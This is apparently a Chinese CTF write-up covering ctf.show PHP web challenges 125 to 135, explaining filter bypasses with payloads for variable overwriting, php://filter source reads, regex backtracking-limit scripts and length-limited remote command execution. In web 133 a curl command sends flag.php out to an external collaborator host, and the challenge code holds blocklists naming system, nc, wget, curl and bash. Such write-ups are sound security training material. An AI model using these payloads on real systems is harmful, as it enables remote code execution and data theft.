😋 大家好,我是YAy_17,是一枚爱好网安的小白,自学ing。
本人水平有限,欢迎各位大佬指点,一起学习 💗 ,一起进步 ⭐ 。
⭐ 此后如竟没有炬火,我便是唯一的光。 ⭐
web 125
<?php
error_reporting(0);
highlight_file(__FILE__);
include("flag.php");
$a=$_SERVER['argv'];
$c=$_POST['fun'];
if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g'])){
if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\%|\^|\*|\-|\+|\=|\{|\}|\"|\'|\,|\.|\;|\?|flag|GLOBALS|echo|var_dump|print/i", $c)&&$c<=16){
eval("$c".";");
if($fl0g==="flag_give_me"){
echo $flag;
}
}
}
?>var_dump()被过滤,但是还有var_export()函数,该函数与var_dump函数功能类似:
fun=var_export(get_defined_vars())&CTF_SHOW=1&CTF[SHOW.COM=1web 126
上面的方法已经不能在使用了,这里本地测试这样一段代码:
<?php
$a = $_SERVER['argv'];
var_dump($a);
//传入a=1+fl0g=flag_give_me
//得到:array(2) { [0]=> string(3) "a=1" [1]=> string(17) "fl0g=flag_give_me"
?>之后再利用parse_str()函数将字符串解析到变量中;
<?php
parse_str("name=Peter&age=43");
echo $name."<br>";
echo $age;
?>//输出结果为:Peter
//43
最终的payload为:
get:a=1+fl0g=flag_give_me
post:fun=parse_str($a[1])&CTF_SHOW=1&CTF[ SHOW.COM =1
web 127
<?php
error_reporting(0);
include("flag.php");
highlight_file(__FILE__);
$ctf_show = md5($flag);
$url = $_SERVER['QUERY_STRING'];
//特殊字符检测
function waf($url){
if(preg_match('/\`|\~|\!|\@|\#|\^|\*|\(|\)|\\$|\_|\-|\+|\{|\;|\:|\[|\]|\}|\'|\"|\<|\,|\>|\.|\\\|\//', $url)){
return true;
}else{
return false;
}
}
if(waf($url)){
die("嗯哼?");
}else{
extract($_GET);
}
if($ctf_show==='ilove36d'){
echo $flag;
} php在解析查询字符串的时候,他会做两件事情:
将空白符删除掉
将某些字符替换为下划线(某些字符包括:. [ + _ 以及空格)
payload:ctf show=ilove36d
web 128
<?php
error_reporting(0);
include("flag.php");
highlight_file(__FILE__);
$f1 = $_GET['f1'];
$f2 = $_GET['f2'];
if(check($f1)){
var_dump(call_user_func(call_user_func($f1,$f2)));
}else{
echo "嗯哼?";
}
function check($str){
return !preg_match('/[0-9]|[a-z]/i', $str);
}本题目考察的是gettext()函数,GET方式传递的参数f1会经过check函数的检测,不可以包含数字和字母,所以gettext函数就无法通过check函数的正则匹配;
gettext()函数的扩展---->_() 二者的效果是相同的;
需要在php.ini中,找到“extension=php_gettext.dll”,将前面的分号去掉:
测试代码:
可见二者的效果是相同的!
f2可以使用get_defined_vars()函数,此函数返回一个包含所有已定义变量列表的多维数组,这些变量包括环境变量、服务器变量和用户定义的变量。
paylaod: f1=_&f2=get_defined_vars
web 129
<?php
error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['f'])){
$f = $_GET['f'];
if(stripos($f, 'ctfshow')>0){
echo readfile($f);
}
} stripos():返回某一个字符串在另一个字符串中首次出现的位置;第一个位置是0;
可以使用php://filter伪协议,将过滤器写为ctfshow,无效就会被忽略,直接输出源码
f=php://filter/ctfshow/resource=flag.php
web 130
<?php
error_reporting(0);
highlight_file(__FILE__);
include("flag.php");
if(isset($_POST['f'])){
$f = $_POST['f'];
if(preg_match('/.+?ctfshow/is', $f)){
die('bye!');
}
if(stripos($f, 'ctfshow') === FALSE){
die('bye!!');
}
echo $flag;
}在题目链接处,有一个提示:
先分析代码中的if条件:
preg_match():其中的‘.’代表着匹配前面的单个字符,‘+’代表匹配一次或者是多次,‘+?’代表重复一次或者多次,尽可能的少重复;(大概就是匹配到*ctfshow,*代表任意字符,就会返回true)
stripos()函数:不区分大小写,返回子串在字符串中第一次出现的位置,位置是从0开始的;没有查找到,返回FALSE,stripos函数对于传递数组情况下,返回值为NULL,NULL!=FALSE
因此这里就存在两种方法:
直接传参值为:ctfshow
传递数组f[]=1
看大佬的wp还有一种方法就是题目提示的方法,利用回溯限制,当回溯的次数超过了25w的时候,使得preg_match函数返回false,从而绕过preg_match函数:
import requests
url = 'http://d85be3be-8a0c-43e5-bb50-72ee96382dac.challenge.ctf.show/'
data={
'f':'very'*250000+'ctfshow'
}
r = requests.post(url=url,data=data).text
print(r)
web 131
<?php
error_reporting(0);
highlight_file(__FILE__);
include("flag.php");
if(isset($_POST['f'])){
$f = (String)$_POST['f'];
if(preg_match('/.+?ctfshow/is', $f)){
die('bye!');
}
if(stripos($f,'36Dctfshow') === FALSE){
die('bye!!');
}
echo $flag;
}上面的两种方法都不能用了,只能用回溯的方法:
import requests
url = 'http://560daf29-37f2-4477-ab88-20b8a8976876.challenge.ctf.show/'
data = {
'f':'very'*250000+'36Dctfshow'
}
r = requests.post(url=url,data=data).text
print(r)web 132
来到界面,尝试点了点链接,没什么发现:
尝试访问了robots.txt:
尝试访问,成功发现题目所在地:
<?php
#error_reporting(0);
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['username']) && isset($_GET['password']) && isset($_GET['code'])){
$username = (String)$_GET['username'];
$password = (String)$_GET['password'];
$code = (String)$_GET['code'];
if($code === mt_rand(1,0x36D) && $password === $flag || $username ==="admin"){
if($code == 'admin'){
echo $flag;
}
}
} 在第二个if中发现存在&&和||,要知道&&的优先级是高于||的,因此$code === mt_rand(1,0x36D) 如果为假,后面的 $password === $flag是不会执行的!我们只需要让username=admin即可
第三个if需要让$code变量为admin,所以只需要让code再等于admin即可,password任意
web 133
限制长度且无回显的RCE:
<?php
error_reporting(0);
highlight_file(__FILE__);
//flag.php
if($F = @$_GET['F']){
if(!preg_match('/system|nc|wget|exec|passthru|netcat/i', $F)){
eval(substr($F,0,6));
}else{
die("6个字母都还不够呀?!");
}
} 这个题目涨姿势了;思路是利用变量覆盖实现rce:
?F=`$F`;+sleep 3
上面的payload看似超过了长度6,但是执行的时候,发现网页好像是延迟了3秒,思考一下原理:我们通过GET方式传递了F参数,值为`$F`;+sleep 3,通过substr()函数截取了前面的六位字符,然后通过eval()函数进行执行;也就是截取的`$F`;+ 通过eval()函数,将eval函数中的内容当作是php代码进行执行;``符号其实就是shell_exec函数,进行命令执行。相当于执行的就是变量F的内容。
那么变量F的内容是什么?就是我们传递的`$F`;+sleep 3 最终`$F`----->``$F;+sleep 3成功突破长度的限制;
总结来说就是+号后面都是我们可控的!
接下来就是通过curl来带出flag.php
curl是一种命令行工具,作用是发出网络请求,然后获取数据,显示在”标准输出“上。
curl -f将flag文件上传到Brup Suite的Collaborator Client(类似于DNSLOG),其功能要比DNSLOG强大,主要体现在可以查看POST请求以及打Cookies
查看网页源码:直接在curl命令后面加上网址 例如curl www.baidu.com
如果要把这个网页保存下来,可以使用-o参数 例如curl -o 【文件名】 www.baidu.com
发送表单信息:
GET方式相对简单,只要把数据附在网址后面就行
POST方式必须要把数据和网址分开,curl就要用到--data或者是-d参数;例如 curl -X POST --data "data=xxx" www.xxx.com (不加-X默认是GET方式 -X可以指定请求方式)
//payload:
?F=`$F`;+curl -X POST -F xx=@flag.php http://gk4ubl6jnzii6pmkgmvyvmhxsoyfm4.oastify.com其中-X 指定请求方式POST
-F 为带文件的形式发送POST请求
xx是上传文件的name值,flag.php就是上传的文件
web 134
<?php
highlight_file(__FILE__);
$key1 = 0;
$key2 = 0;
if(isset($_GET['key1']) || isset($_GET['key2']) || isset($_POST['key1']) || isset($_POST['key2'])) {
die("nonononono");
}
@parse_str($_SERVER['QUERY_STRING']);
extract($_POST);
if($key1 == '36d' && $key2 == '36d') {
die(file_get_contents('flag.php'));
} 以GET方式传递_POST[a],就相当于post方式传递参数a
//构造payload:
?_POST[key1]=36d&_POST[key2]=36d查看源码拿到flag
web 135
<?php
error_reporting(0);
highlight_file(__FILE__);
//flag.php
if($F = @$_GET['F']){
if(!preg_match('/system|nc|wget|exec|passthru|bash|sh|netcat|curl|cat|grep|tac|more|od|sort|tail|less|base64|rev|cut|od|strings|tailf|head/i', $F)){
eval(substr($F,0,6));
}else{
die("师傅们居然破解了前面的,那就来一个加强版吧");
}
} 在133,通过使用命令行工具curl实现,但是在135会发现,正则匹配中存在着curl;
但是没有过滤nl cp mv等命令;
?F=`$F`;+cp flag.php flag.txt
?F=`$F`;+mv flag.php flag.txt
?F=`$F`;+nl f*>flag.txt
